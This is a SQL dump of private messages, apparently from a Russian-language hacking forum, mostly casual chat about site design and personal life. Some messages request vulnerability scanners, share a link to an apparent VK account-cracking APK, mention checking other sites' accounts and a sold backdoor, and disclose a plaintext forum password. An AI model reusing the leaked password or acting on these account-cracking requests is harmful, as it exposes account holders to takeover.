INSERT INTO letters VALUES("288","27","1","хорошо!","1426446724","1","i","0","");
INSERT INTO letters VALUES("289","1","27","хорошо!","1426446724","1","o","0","");
INSERT INTO letters VALUES("290","27","1","есче предлогаю зделать чат для забоненых как на бумасе! и людей на доске выделением знака ну тож как на бумасе","1426446869","1","i","0","");
INSERT INTO letters VALUES("291","1","27","есче предлогаю зделать чат для забоненых как на бумасе! и людей на доске выделением знака ну тож как на бумасе","1426446869","1","o","0","");
INSERT INTO letters VALUES("292","1","27","Да, сейчас делаю доску :)","1426447028","1","i","0","");
INSERT INTO letters VALUES("293","27","1","Да, сейчас делаю доску :)","1426447028","1","o","0","");
INSERT INTO letters VALUES("294","27","1","окей!","1426447068","1","i","0","");
INSERT INTO letters VALUES("295","1","27","окей!","1426447068","1","o","0","");
INSERT INTO letters VALUES("296","27","1","http://hackbite.ru/mag/otovare.php?i=23<br /> норм двиг? дырывый?","1426447468","1","i","0","");
INSERT INTO letters VALUES("297","1","27","http://hackbite.ru/mag/otovare.php?i=23<br /> норм двиг? дырывый?","1426447468","1","o","0","");
INSERT INTO letters VALUES("298","0","1","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user27\">vinkh</a><span style=\"color: green;\"> [Ст.Мод]</span> поставил Вам <a href=\"avtoritet.php?do=history&nk=1\">плюс</a>!","1426448074","1","i","0","");
INSERT INTO letters VALUES("299","30","1","Привет. Куки не пашут думаю","1426452286","1","i","0","");
INSERT INTO letters VALUES("300","1","30","Привет. Куки не пашут думаю","1426452286","1","o","0","");
INSERT INTO letters VALUES("301","41","1","…норм диз эта <span style=\"color: #FF0000;\"><b>[censored]</b></span>ня меня убивает","1426454903","1","i","0","");
INSERT INTO letters VALUES("302","1","41","…норм диз эта <span style=\"color: #FF0000;\"><b>[censored]</b></span>ня меня убивает","1426454903","1","o","0","");
INSERT INTO letters VALUES("303","39","1","секретный вопрос смотри","1426459780","1","i","0","mail/file_951735.png");
INSERT INTO letters VALUES("304","1","39","секретный вопрос смотри","1426459780","1","o","0","mail/file_951735.png");
INSERT INTO letters VALUES("305","1","41","Привет, диз не нравится?","1426479452","1","i","0","");
INSERT INTO letters VALUES("306","41","1","Привет, диз не нравится?","1426479452","1","o","0","");
INSERT INTO letters VALUES("307","1","27","Норм, вроде","1426479538","1","i","0","");
INSERT INTO letters VALUES("308","27","1","Норм, вроде","1426479538","1","o","0","");
INSERT INTO letters VALUES("309","1","30","Они пашут, но ограничение по времени стоит","1426479573","1","i","0","");
INSERT INTO letters VALUES("310","30","1","Они пашут, но ограничение по времени стоит","1426479573","1","o","0","");
INSERT INTO letters VALUES("311","41","1","Да, сделай норм","1426481119","1","i","0","");
INSERT INTO letters VALUES("312","1","41","Да, сделай норм","1426481119","1","o","0","");
INSERT INTO letters VALUES("313","1","41","Уже заказан новый, скоро поменяем","1426481187","1","i","0","");
INSERT INTO letters VALUES("314","41","1","Уже заказан новый, скоро поменяем","1426481187","1","o","0","");
INSERT INTO letters VALUES("315","30","1","ясно. так и задуманно жцмаю да?","1426482142","1","i","0","");
INSERT INTO letters VALUES("316","1","30","ясно. так и задуманно жцмаю да?","1426482142","1","o","0","");
INSERT INTO letters VALUES("317","1","30","Ну да,","1426482260","1","i","0","");
INSERT INTO letters VALUES("318","30","1","Ну да,","1426482260","1","o","0","");
INSERT INTO letters VALUES("319","1","51","Макс привет :)","1426486207","1","i","0","");
INSERT INTO letters VALUES("320","51","1","Макс привет :)","1426486207","1","o","0","");
INSERT INTO letters VALUES("321","51","1","Ку :)","1426486303","1","i","0","");
INSERT INTO letters VALUES("322","1","51","Ку :)","1426486303","1","o","0","");
INSERT INTO letters VALUES("323","1","51","Какими судьбами? :)","1426486406","1","i","0","");
INSERT INTO letters VALUES("324","51","1","Какими судьбами? :)","1426486406","1","o","0","");
INSERT INTO letters VALUES("325","51","1","С форума :) Как ты? Так и не восстановили акк ?","1426486450","1","i","0","");
INSERT INTO letters VALUES("326","1","51","С форума :) Как ты? Так и не восстановили акк ?","1426486450","1","o","0","");
INSERT INTO letters VALUES("327","1","51","Угу :( Жене писал, так он чёт заморозился, так до сех пор и не ответил","1426486503","1","i","0","");
INSERT INTO letters VALUES("328","51","1","Угу :( Жене писал, так он чёт заморозился, так до сех пор и не ответил","1426486503","1","o","0","");
INSERT INTO letters VALUES("329","51","1","Мда<br />... <br /><br />Сегодня как освобожусь, напишу ему.","1426486604","1","i","0","");
INSERT INTO letters VALUES("330","1","51","Мда<br />... <br /><br />Сегодня как освобожусь, напишу ему.","1426486604","1","o","0","");
INSERT INTO letters VALUES("331","1","51","ок, спс :)","1426486636","1","i","0","");
INSERT INTO letters VALUES("332","51","1","ок, спс :)","1426486636","1","o","0","");
INSERT INTO letters VALUES("333","51","1",":)","1426486685","1","i","0","");
INSERT INTO letters VALUES("334","1","51",":)","1426486685","1","o","0","");
INSERT INTO letters VALUES("335","51","1","Кинь на биллинг немного :)","1426486814","1","i","0","");
INSERT INTO letters VALUES("336","1","51","Кинь на биллинг немного :)","1426486814","1","o","0","");
INSERT INTO letters VALUES("337","1","51","сек :)","1426487037","1","i","0","");
INSERT INTO letters VALUES("338","51","1","сек :)","1426487037","1","o","0","");
INSERT INTO letters VALUES("339","51","1","Спасибо :)","1426487065","1","i","0","");
INSERT INTO letters VALUES("340","1","51","Спасибо :)","1426487065","1","o","0","");
INSERT INTO letters VALUES("341","0","1","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user51\">Groznyy</a> поставил Вам <a href=\"avtoritet.php?do=history&nk=1\">плюс</a>!","1426487102","1","i","0","");
INSERT INTO letters VALUES("342","1","51","готово :)","1426487113","1","i","0","");
INSERT INTO letters VALUES("343","51","1","готово :)","1426487113","1","o","0","");
INSERT INTO letters VALUES("344","51","1",":)","1426487241","1","i","0","");
INSERT INTO letters VALUES("345","1","51",":)","1426487241","1","o","0","");
INSERT INTO letters VALUES("346","39","1","дай ссыль на диз пошаманю нимнога Гг","1426510168","1","i","0","");
INSERT INTO letters VALUES("347","1","39","дай ссыль на диз пошаманю нимнога Гг","1426510168","1","o","0","");
INSERT INTO letters VALUES("348","1","39","Всмысле Гг","1426510758","1","i","0","");
INSERT INTO letters VALUES("349","39","1","Всмысле Гг","1426510758","1","o","0","");
INSERT INTO letters VALUES("350","27","1","дай мне его гляну","1426511180","1","i","0","");
INSERT INTO letters VALUES("351","1","27","дай мне его гляну","1426511180","1","o","0","");
INSERT INTO letters VALUES("352","39","1","в карамысле Гг","1426511780","1","i","0","");
INSERT INTO letters VALUES("353","1","39","в карамысле Гг","1426511780","1","o","0","");
INSERT INTO letters VALUES("354","7","1","Дарова. Ну че там?","1426515053","1","i","0","");
INSERT INTO letters VALUES("355","1","7","Дарова. Ну че там?","1426515053","1","o","0","");
INSERT INTO letters VALUES("356","1","7","сегодня попозже сброшу данные :)","1426519636","1","i","0","");
INSERT INTO letters VALUES("357","7","1","сегодня попозже сброшу данные :)","1426519636","1","o","0","");
INSERT INTO letters VALUES("358","41","1","Давай, ты жи стрим?","1426520154","1","i","0","");
INSERT INTO letters VALUES("359","1","41","Давай, ты жи стрим?","1426520154","1","o","0","");
INSERT INTO letters VALUES("360","7","1","Окк","1426523136","1","i","0","");
INSERT INTO letters VALUES("361","1","7","Окк","1426523136","1","o","0","");
INSERT INTO letters VALUES("362","39","27","привет можеш скачать файл и выложить сюда?я скачааю а то у меня proxy","1426523442","1","i","0","");
INSERT INTO letters VALUES("363","27","39","привет можеш скачать файл и выложить сюда?я скачааю а то у меня proxy","1426523442","1","o","0","");
INSERT INTO letters VALUES("364","39","30","привет можеш скачать файл и<br />выложить сюда?я потом скачаю а то у<br />меня proxy","1426523764","1","i","0","");
INSERT INTO letters VALUES("365","30","39","привет можеш скачать файл и<br />выложить сюда?я потом скачаю а то у<br />меня proxy","1426523764","1","o","0","");
INSERT INTO letters VALUES("366","27","39","какой?","1426523824","1","i","0","");
INSERT INTO letters VALUES("367","39","27","какой?","1426523824","1","o","0","");
INSERT INTO letters VALUES("368","39","27","одну прогу","1426523899","1","i","0","");
INSERT INTO letters VALUES("369","27","39","одну прогу","1426523899","1","o","0","");
INSERT INTO letters VALUES("370","27","39","довай","1426524006","1","i","0","");
INSERT INTO letters VALUES("371","39","27","довай","1426524006","1","o","0","");
INSERT INTO letters VALUES("372","39","27","http://mimonline.ru/mobile/proxy_load.php?id=177&name=vklom_Andr_free.apk<br />","1426524029","1","i","0","");
INSERT INTO letters VALUES("373","27","39","http://mimonline.ru/mobile/proxy_load.php?id=177&name=vklom_Andr_free.apk<br />","1426524029","1","o","0","");
INSERT INTO letters VALUES("374","30","39","Что за файл?","1426524050","1","i","0","");
INSERT INTO letters VALUES("375","39","30","Что за файл?","1426524050","1","o","0","");
INSERT INTO letters VALUES("376","39","30","прога для андроида","1426524150","1","i","0","");
INSERT INTO letters VALUES("377","30","39","прога для андроида","1426524150","1","o","0","");
INSERT INTO letters VALUES("378","30","39","давай","1426524180","1","i","0","");
INSERT INTO letters VALUES("379","39","30","давай","1426524180","1","o","0","");
INSERT INTO letters VALUES("380","39","30","mimonline.ru/mobile/proxy_load.php?id=177&name=vklom_Andr_free.apk","1426524256","1","i","0","");
INSERT INTO letters VALUES("381","30","39","mimonline.ru/mobile/proxy_load.php?id=177&name=vklom_Andr_free.apk","1426524256","1","o","0","");
INSERT INTO letters VALUES("382","27","39","Невозможно найти удалённый сервер<br />Вы попытались получить доступ к адресу http://mimonline.ru/mobile/<br />proxy_load.php?id=177&name=vklom_Andr_free.apk , который сейчас<br />недоступен. Убедитесь, что веб-адрес (URL) введён правильно, и<br />попытайтесь перезагрузить страницу.<br />Убедитесь, что соединение с интернетом активно, и проверьте,<br />работают ли другие приложения, использующие это соединение.","1426524495","1","i","0","");
INSERT INTO letters VALUES("383","39","27","Невозможно найти удалённый сервер<br />Вы попытались получить доступ к адресу http://mimonline.ru/mobile/<br />proxy_load.php?id=177&name=vklom_Andr_free.apk , который сейчас<br />недоступен. Убедитесь, что веб-адрес (URL) введён правильно, и<br />попытайтесь перезагрузить страницу.<br />Убедитесь, что соединение с интернетом активно, и проверьте,<br />работают ли другие приложения, использующие это соединение.","1426524495","1","o","0","");
INSERT INTO letters VALUES("384","39","27","хм но всеравно спасибо что потратил время","1426524666","1","i","0","");
INSERT INTO letters VALUES("385","27","39","хм но всеравно спасибо что потратил время","1426524666","1","o","0","");
INSERT INTO letters VALUES("386","30","39","Невозможно найти удалённый<br />сервер","1426524807","1","i","0","");
INSERT INTO letters VALUES("387","39","30","Невозможно найти удалённый<br />сервер","1426524807","1","o","0","");
INSERT INTO letters VALUES("388","27","39","нез","1426524844","1","i","0","");
INSERT INTO letters VALUES("389","39","27","нез","1426524844","1","o","0","");
INSERT INTO letters VALUES("390","39","30","хм но всеравно спасибо что<br />потратил время","1426524909","1","i","0","");
INSERT INTO letters VALUES("391","30","39","хм но всеравно спасибо что<br />потратил время","1426524909","1","o","0","");
INSERT INTO letters VALUES("392","30","39",")) Незачто) Обрашайся","1426525224","1","i","0","");
INSERT INTO letters VALUES("393","39","30",")) Незачто) Обрашайся","1426525224","1","o","0","");
INSERT INTO letters VALUES("394","30","39","..","1426525243","1","i","0","");
INSERT INTO letters VALUES("395","39","30","..","1426525243","1","o","0","");
INSERT INTO letters VALUES("396","30","1","пока что нового диза нету могу довости этот до ума…","1426525743","1","i","0","");
INSERT INTO letters VALUES("397","1","30","пока что нового диза нету могу довости этот до ума…","1426525743","1","o","0","");
INSERT INTO letters VALUES("398","1","41","Допустим","1426527483","1","i","0","");
INSERT INTO letters VALUES("399","41","1","Допустим","1426527483","1","o","0","");
INSERT INTO letters VALUES("400","27","1","недаш?","1426529927","1","i","0","");
INSERT INTO letters VALUES("401","1","27","недаш?","1426529927","1","o","0","");
INSERT INTO letters VALUES("402","7","1","Я ща на работу, если че, скинешь данные, я завтра с часов 10 начну","1426530377","1","i","0","");
INSERT INTO letters VALUES("403","1","7","Я ща на работу, если че, скинешь данные, я завтра с часов 10 начну","1426530377","1","o","0","");
INSERT INTO letters VALUES("404","1","27","С телефона сейчас","1426567065","1","i","0","");
INSERT INTO letters VALUES("405","27","1","С телефона сейчас","1426567065","1","o","0","");
INSERT INTO letters VALUES("406","43","1","Привет, адаптируй сайт, а то с мобилы фиговато","1426576405","1","i","0","");
INSERT INTO letters VALUES("407","1","43","Привет, адаптируй сайт, а то с мобилы фиговато","1426576405","1","o","0","");
INSERT INTO letters VALUES("408","43","1","....","1426576432","1","i","0","mail/file_204555.png");
INSERT INTO letters VALUES("409","1","43","....","1426576432","1","o","0","mail/file_204555.png");
INSERT INTO letters VALUES("410","1","43","ок, скоро диз новый будет :)","1426585966","1","i","0","");
INSERT INTO letters VALUES("411","43","1","ок, скоро диз новый будет :)","1426585966","1","o","0","");
INSERT INTO letters VALUES("412","1","7","окей","1426586236","1","i","0","");
INSERT INTO letters VALUES("413","7","1","окей","1426586236","1","o","0","");
INSERT INTO letters VALUES("414","7","1","Дома уже","1426586950","1","i","0","");
INSERT INTO letters VALUES("415","1","7","Дома уже","1426586950","1","o","0","");
INSERT INTO letters VALUES("416","1","7","я тож домой скоро приеду","1426587157","1","i","0","");
INSERT INTO letters VALUES("417","7","1","я тож домой скоро приеду","1426587157","1","o","0","");
INSERT INTO letters VALUES("418","7","1","оке","1426589348","1","i","0","");
INSERT INTO letters VALUES("419","1","7","оке","1426589348","1","o","0","");
INSERT INTO letters VALUES("420","7","1","Вижу хрен дождусь от тебя данные Гг Ну так вот, начал мутить http://leto.vlovse.ru/ оцени :)","1426618426","0","i","0","");
INSERT INTO letters VALUES("421","1","7","Вижу хрен дождусь от тебя данные Гг Ну так вот, начал мутить http://leto.vlovse.ru/ оцени :)","1426618426","1","o","0","");
INSERT INTO letters VALUES("422","0","1","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user7\"><span style=\"color: #330000\">N</span><span style=\"color: #660000\">r</span><span style=\"color: #990000\">a</span><span style=\"color: #CC0000\">v</span><span style=\"color: #FF0000\">o</span></a><span style=\"color: green;\"> [Адм]</span> поставил Вам <a href=\"avtoritet.php?do=history&nk=1\">плюс</a>!","1426619914","1","i","0","");
INSERT INTO letters VALUES("423","0","7","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user21\">IronnHeart</a><span style=\"color: green;\"> [Ст.Мод]</span> поставил Вам <a href=\"avtoritet.php?do=history&nk=7\">плюс</a>!","1426668094","1","i","0","");
INSERT INTO letters VALUES("424","65","1","даров","1426772837","1","i","0","");
INSERT INTO letters VALUES("425","1","65","даров","1426772837","1","o","0","");
INSERT INTO letters VALUES("426","1","65","привет","1426782668","1","i","0","");
INSERT INTO letters VALUES("427","65","1","привет","1426782668","1","o","0","");
INSERT INTO letters VALUES("428","7","1","Закрыл сайт","1426783835","0","i","0","");
INSERT INTO letters VALUES("429","1","7","Закрыл сайт","1426783835","1","o","0","");
INSERT INTO letters VALUES("430","65","1","ты вообще кто<br />чтото просто твой ник не знаком","1426784600","1","i","0","");
INSERT INTO letters VALUES("431","1","65","ты вообще кто<br />чтото просто твой ник не знаком","1426784600","1","o","0","");
INSERT INTO letters VALUES("432","1","65","Меня в вапе многие знают","1426873146","1","i","0","");
INSERT INTO letters VALUES("433","65","1","Меня в вапе многие знают","1426873146","1","o","0","");
INSERT INTO letters VALUES("434","41","1","Го меня в соадмины)","1426891587","1","i","0","");
INSERT INTO letters VALUES("435","1","41","Го меня в соадмины)","1426891587","1","o","0","");
INSERT INTO letters VALUES("436","1","41","хмм...","1426910264","1","i","0","");
INSERT INTO letters VALUES("437","41","1","хмм...","1426910264","1","o","0","");
INSERT INTO letters VALUES("438","7","1","Норм диз?","1426922243","0","i","0","");
INSERT INTO letters VALUES("439","1","7","Норм диз?","1426922243","1","o","0","");
INSERT INTO letters VALUES("440","65","1","ник какой в инете<br />по мимо этого<br />прост я не вкурил кто ты<br />","1426924947","1","i","0","");
INSERT INTO letters VALUES("441","1","65","ник какой в инете<br />по мимо этого<br />прост я не вкурил кто ты<br />","1426924947","1","o","0","");
INSERT INTO letters VALUES("442","65","1","поверь меня тоже многие знают","1426924969","1","i","0","");
INSERT INTO letters VALUES("443","1","65","поверь меня тоже многие знают","1426924969","1","o","0","");
INSERT INTO letters VALUES("444","72","1","а тебе мд не нужны случайно?","1426944751","1","i","0","");
INSERT INTO letters VALUES("445","1","72","а тебе мд не нужны случайно?","1426944751","1","o","0","");
INSERT INTO letters VALUES("446","80","1","В вк напиши, или кинь двиг тут.. (в вк только я сижу чо своего акка).","1426979597","1","i","0","");
INSERT INTO letters VALUES("447","1","80","В вк напиши, или кинь двиг тут.. (в вк только я сижу чо своего акка).","1426979597","1","o","0","");
INSERT INTO letters VALUES("448","80","1","ну <span style=\"color: #FF0000;\"><b>[censored]</b></span>ь долго ждать","1427069541","0","i","0","");
INSERT INTO letters VALUES("449","1","80","ну <span style=\"color: #FF0000;\"><b>[censored]</b></span>ь долго ждать","1427069541","1","o","0","");
INSERT INTO letters VALUES("450","72","1","привет, ну что, дашь прогу по поиску уязвимостей сайтов?","1427085642","0","i","0","");
INSERT INTO letters VALUES("451","1","72","привет, ну что, дашь прогу по поиску уязвимостей сайтов?","1427085642","1","o","0","");
INSERT INTO letters VALUES("452","19","1","Привет!","1427106810","0","i","0","");
INSERT INTO letters VALUES("453","1","19","Привет!","1427106810","1","o","0","");
INSERT INTO letters VALUES("454","69","80","Бэк продал?","1427106981","1","i","0","");
INSERT INTO letters VALUES("455","80","69","Бэк продал?","1427106981","1","o","0","");
INSERT INTO letters VALUES("456","0","7","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user82\">MobiEx</a> поставил Вам <a href=\"avtoritet.php?do=history&nk=7\">плюс</a>!","1427107878","1","i","0","");
INSERT INTO letters VALUES("457","80","69","Нет. я хз откуда он тут...Даже уменя его нет","1427108126","0","i","0","");
INSERT INTO letters VALUES("458","69","80","Нет. я хз откуда он тут...Даже уменя его нет","1427108126","1","o","0","");
INSERT INTO letters VALUES("459","0","5","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user82\">MobiEx</a> поставил Вам <a href=\"avtoritet.php?do=history&nk=5\">плюс</a>!","1427547605","0","i","0","");
INSERT INTO letters VALUES("460","80","1","…прету вот т<span style=\"color: #FF0000;\"><b>[censored]</b></span> кидло не ожидал","1427788769","0","i","0","");
INSERT INTO letters VALUES("462","96","94","диз <span style=\"color: #FF0000;\"><b>[censored]</b></span>тый а двиг этот…","1434719237","1","i","0","");
INSERT INTO letters VALUES("463","94","96","диз <span style=\"color: #FF0000;\"><b>[censored]</b></span>тый а двиг этот…","1434719237","1","o","0","");
INSERT INTO letters VALUES("464","96","94","Диз кул. Выключи анитмат это не соцка .данет.","1434719285","1","i","0","");
INSERT INTO letters VALUES("465","94","96","Диз кул. Выключи анитмат это не соцка .данет.","1434719285","1","o","0","");
INSERT INTO letters VALUES("565","96","94","Ето к едику ,а я влад)","1436584320","1","o","0","");
INSERT INTO letters VALUES("566","96","94","Напиши ему что-бы написал мне в асю 10361141","1436610498","1","i","0","");
INSERT INTO letters VALUES("467","94","96","Сам выруби)) ну пока этот двиг.. а дальше больше. кстать видел скольк денег на акке кео))?","1434722045","1","i","0","");
INSERT INTO letters VALUES("468","96","94","Сам выруби)) ну пока этот двиг.. а дальше больше. кстать видел скольк денег на акке кео))?","1434722045","1","o","0","");
INSERT INTO letters VALUES("469","96","94","Видел... Ты чё богатый буратино?.данет.","1434722378","1","i","0","");
INSERT INTO letters VALUES("470","94","96","Видел... Ты чё богатый буратино?.данет.","1434722378","1","o","0","");
INSERT INTO letters VALUES("471","94","96","Та не.. подфартило))","1434722438","1","i","0","");
INSERT INTO letters VALUES("472","96","94","Та не.. подфартило))","1434722438","1","o","0","");
INSERT INTO letters VALUES("473","96","94","Чё сделал? :-)","1434722502","1","i","0","");
INSERT INTO letters VALUES("474","94","96","Чё сделал? :-)","1434722502","1","o","0","");
INSERT INTO letters VALUES("475","94","96","Подарили))","1434722631","1","i","0","");
INSERT INTO letters VALUES("476","96","94","Подарили))","1434722631","1","o","0","");
INSERT INTO letters VALUES("477","96","94","подарочки мне бы такие .данет.<br /> Пиздец как всё заебло, aliexpress ещё бесит не авторизовывается с моей мобилы там...<br />А я вчера заказал лазер для своей PS 2, через брата пк...<br />","1434722814","1","i","0","");
INSERT INTO letters VALUES("478","94","96","подарочки мне бы такие .данет.<br /> Пиздец как всё заебло, aliexpress ещё бесит не авторизовывается с моей мобилы там...<br />А я вчера заказал лазер для своей PS 2, через брата пк...<br />","1434722814","1","o","0","");
INSERT INTO letters VALUES("479","94","96","В армейку не идешь?","1434723579","1","i","0","");
INSERT INTO letters VALUES("480","96","94","В армейку не идешь?","1434723579","1","o","0","");
INSERT INTO letters VALUES("481","94","96","Чет форум не робит.","1434723752","1","i","0","");
INSERT INTO letters VALUES("482","96","94","Чет форум не робит.","1434723752","1","o","0","");
INSERT INTO letters VALUES("483","96","94","Позже... Ещё надо выучится на пару проффесий .данет.","1434723752","1","i","0","");
INSERT INTO letters VALUES("484","94","96","Позже... Ещё надо выучится на пару проффесий .данет.","1434723752","1","o","0","");
INSERT INTO letters VALUES("485","94","96","Аа))","1434723786","1","i","0","");
INSERT INTO letters VALUES("486","96","94","Аа))","1434723786","1","o","0","");
INSERT INTO letters VALUES("487","96","94","Пойду на авто-механника т.к. Права на халяву нужны .данет.","1434724318","1","i","0","");
INSERT INTO letters VALUES("488","94","96","Пойду на авто-механника т.к. Права на халяву нужны .данет.","1434724318","1","o","0","");
INSERT INTO letters VALUES("489","94","96","Норма))","1434724377","1","i","0","");
INSERT INTO letters VALUES("490","96","94","Норма))","1434724377","1","o","0","");
INSERT INTO letters VALUES("491","96","94","Вот жду корочкие о окончании 9-ого класса .данет.<br />Пока работая плотником :D<br />По связям будут корки, и пойду учится в технарь :D","1434724705","1","i","0","");
INSERT INTO letters VALUES("492","94","96","Вот жду корочкие о окончании 9-ого класса .данет.<br />Пока работая плотником :D<br />По связям будут корки, и пойду учится в технарь :D","1434724705","1","o","0","");
INSERT INTO letters VALUES("493","96","94","алиекспресс мой лазер отправили :)<br />Уже полгода в свою PS2 не играл .данет. Решил оживить... FIFA12 и FightNight round 3 рулят!!! :D","1434728564","1","i","0","");
INSERT INTO letters VALUES("494","94","96","алиекспресс мой лазер отправили :)<br />Уже полгода в свою PS2 не играл .данет. Решил оживить... FIFA12 и FightNight round 3 рулят!!! :D","1434728564","1","o","0","");
INSERT INTO letters VALUES("495","94","96","Лазер эт че))?","1434759492","1","i","0","");
INSERT INTO letters VALUES("496","96","94","Лазер эт че))?","1434759492","1","o","0","");
INSERT INTO letters VALUES("497","96","94","Это хуйня которая считывает диски на PS2","1434760669","1","i","0","");
INSERT INTO letters VALUES("498","94","96","Это хуйня которая считывает диски на PS2","1434760669","1","o","0","");
INSERT INTO letters VALUES("499","94","96","Аа понял) а че с двд не прокатит))?","1434762329","1","i","0","");
INSERT INTO letters VALUES("500","96","94","Аа понял) а че с двд не прокатит))?","1434762329","1","o","0","");
INSERT INTO letters VALUES("501","96","94","Нет в двд он больше, я так впервую очередь и хотел .данет.","1434773249","1","i","0","");
INSERT INTO letters VALUES("502","94","96","Нет в двд он больше, я так впервую очередь и хотел .данет.","1434773249","1","o","0","");
INSERT INTO letters VALUES("503","94","96","))","1434781922","1","i","0","");
INSERT INTO letters VALUES("504","96","94","))","1434781922","1","o","0","");
INSERT INTO letters VALUES("505","96","94","Этот двиг уг... Лучше-бы диз на тот не доделаный подогнал...","1434785174","1","i","0","");
INSERT INTO letters VALUES("506","94","96","Этот двиг уг... Лучше-бы диз на тот не доделаный подогнал...","1434785174","1","o","0","");
INSERT INTO letters VALUES("507","94","96","Кто им заниматся будет? я?? я не кодер) а больше не кому не надо.","1434793535","1","i","0","");
INSERT INTO letters VALUES("508","96","94","Кто им заниматся будет? я?? я не кодер) а больше не кому не надо.","1434793535","1","o","0","");
INSERT INTO letters VALUES("509","96","94","Бля надо кодера которому доверяеш, я один не могу... Меня нервоз берёт, и становится лень. Да и стимула ни какого нет...","1434799482","1","i","0","");
INSERT INTO letters VALUES("510","94","96","Бля надо кодера которому доверяеш, я один не могу... Меня нервоз берёт, и становится лень. Да и стимула ни какого нет...","1434799482","1","o","0","");
INSERT INTO letters VALUES("511","96","94","Бисер согласен сделать стартовую версию хб .данет.","1434802241","1","i","0","");
INSERT INTO letters VALUES("512","94","96","Бисер согласен сделать стартовую версию хб .данет.","1434802241","1","o","0","");
INSERT INTO letters VALUES("513","94","96","Что то придумать надо)","1434807357","1","i","0","");
INSERT INTO letters VALUES("514","96","94","Что то придумать надо)","1434807357","1","o","0","");
INSERT INTO letters VALUES("515","96","94","Пароль от нев.хакбит NeWpasswordZeK<br />Сделал защиту от чека акков, пришлось всем сменить пароль","1434891364","1","i","0","");
INSERT INTO letters VALUES("516","94","96","Пароль от нев.хакбит NeWpasswordZeK<br />Сделал защиту от чека акков, пришлось всем сменить пароль","1434891364","1","o","0","");
INSERT INTO letters VALUES("517","0","2","пидарасы (Это письмо сформировано автоматически Администратором.)","1434891682","0","i","0","");
INSERT INTO letters VALUES("518","0","94","пидарасы (Это письмо сформировано автоматически Администратором.)","1434891682","1","i","0","");
INSERT INTO letters VALUES("519","0","95","пидарасы (Это письмо сформировано автоматически Администратором.)","1434891682","0","i","0","");
INSERT INTO letters VALUES("520","94","96","Ок)) Тим поправь пжл форум тут) хочу диз попробывать замутить)","1434893354","1","i","0","");
INSERT INTO letters VALUES("521","96","94","Ок)) Тим поправь пжл форум тут) хочу диз попробывать замутить)","1434893354","1","o","0","");
INSERT INTO letters VALUES("522","96","94","Нах? Двиг всёравно уг...","1434924962","1","i","0","");
INSERT INTO letters VALUES("523","94","96","Нах? Двиг всёравно уг...","1434924962","1","o","0","");
INSERT INTO letters VALUES("524","94","96","Ну и что)","1434959042","1","i","0","");
INSERT INTO letters VALUES("525","96","94","Ну и что)","1434959042","1","o","0","");
INSERT INTO letters VALUES("526","94","96","Еще и foot выебывается","1434959078","1","i","0","");
INSERT INTO letters VALUES("527","96","94","Еще и foot выебывается","1434959078","1","o","0","");
INSERT INTO letters VALUES("528","96","94","Подгоняй под нев.хакбит.нет, он для запуска готов... Остальное сделаем в процессе...","1434960992","1","i","0","");
INSERT INTO letters VALUES("529","94","96","Подгоняй под нев.хакбит.нет, он для запуска готов... Остальное сделаем в процессе...","1434960992","1","o","0","");
INSERT INTO letters VALUES("530","94","96","Ок","1434976991","1","i","0","");
INSERT INTO letters VALUES("531","96","94","Ок","1434976991","1","o","0","");
INSERT INTO letters VALUES("532","96","94","Регнись по реффке http://moneyya.ru/?ref=78 и потверди мыло.<br />Можеш акков бумаса с рейтом чекнуть?","1435027113","1","i","0","");
INSERT INTO letters VALUES("533","94","96","Регнись по реффке http://moneyya.ru/?ref=78 и потверди мыло.<br />Можеш акков бумаса с рейтом чекнуть?","1435027113","1","o","0","");
INSERT INTO letters VALUES("534","96","94","[url=http://moneyya.ru/?ref=78]рефка[/url]","1435027158","1","i","0","");
INSERT INTO letters VALUES("535","94","96","[url=http://moneyya.ru/?ref=78]рефка[/url]","1435027158","1","o","0","");
INSERT INTO letters VALUES("536","94","96","Черкни)) и с профика)","1435144047","1","i","0","");
INSERT INTO letters VALUES("537","96","94","Черкни)) и с профика)","1435144047","1","o","0","");
INSERT INTO letters VALUES("538","96","94","akk?","1435399058","1","i","0","");
INSERT INTO letters VALUES("539","94","96","akk?","1435399058","1","o","0","");
INSERT INTO letters VALUES("564","94","96","Ето к едику ,а я влад)","1436584320","1","i","0","");
INSERT INTO letters VALUES("541","97","94","Ну и?","1436432085","1","o","0","");
INSERT INTO letters VALUES("562","96","94","Так чё перенесёш?","1436570814","1","i","0","");
INSERT INTO letters VALUES("563","94","96","Так чё перенесёш?","1436570814","1","o","0","");
INSERT INTO letters VALUES("543","96","94","Здарово.","1436515153","1","i","0","");
INSERT INTO letters VALUES("544","94","96","Здарово.","1436515153","1","o","0","");
INSERT INTO letters VALUES("545","94","96","Дарова","1436521213","1","i","0","");
INSERT INTO letters VALUES("546","96","94","Дарова","1436521213","1","o","0","");
INSERT INTO letters VALUES("547","0","94","Пользователь <img src=\"../bugtrack/img/temman.png\"> <a href=\"/user101\">Ticher</a> поставил Вам <a href=\"avtoritet.php?do=history&nk=94\">плюс</a>!","1436521547","1","i","0","");
INSERT INTO letters VALUES("548","96","94","Чё диз к new.hackbit.net не подгоняеш? Он ведь лучше...<br /><br />У тебя мыло от акк с доменом wapfm.ru есть?","1436528281","1","i","0","");
INSERT INTO letters VALUES("549","94","96","Чё диз к new.hackbit.net не подгоняеш? Он ведь лучше...<br /><br />У тебя мыло от акк с доменом wapfm.ru есть?","1436528281","1","o","0","");
INSERT INTO letters VALUES("550","94","96","Етот диз лучше :)","1436528820","1","i","0","");
INSERT INTO letters VALUES("551","96","94","Етот диз лучше :)","1436528820","1","o","0","");
INSERT INTO letters VALUES("552","96","94","Так я имею ввиду что двиг тот лучше.<br /><br />Так мыло от акк есть?","1436528969","1","i","0","");
INSERT INTO letters VALUES("553","94","96","Так я имею ввиду что двиг тот лучше.<br /><br />Так мыло от акк есть?","1436528969","1","o","0","");
INSERT INTO letters VALUES("554","94","96","Чем?","1436529497","1","i","0","");
INSERT INTO letters VALUES("555","96","94","Чем?","1436529497","1","o","0","");
INSERT INTO letters VALUES("556","96","94","Всем. У тебя мыло от акк 2наме.нет с доменом wapfm.ru есть? Я опять данные забыл :D А домен скоро продлевать...","1436529661","1","i","0","");
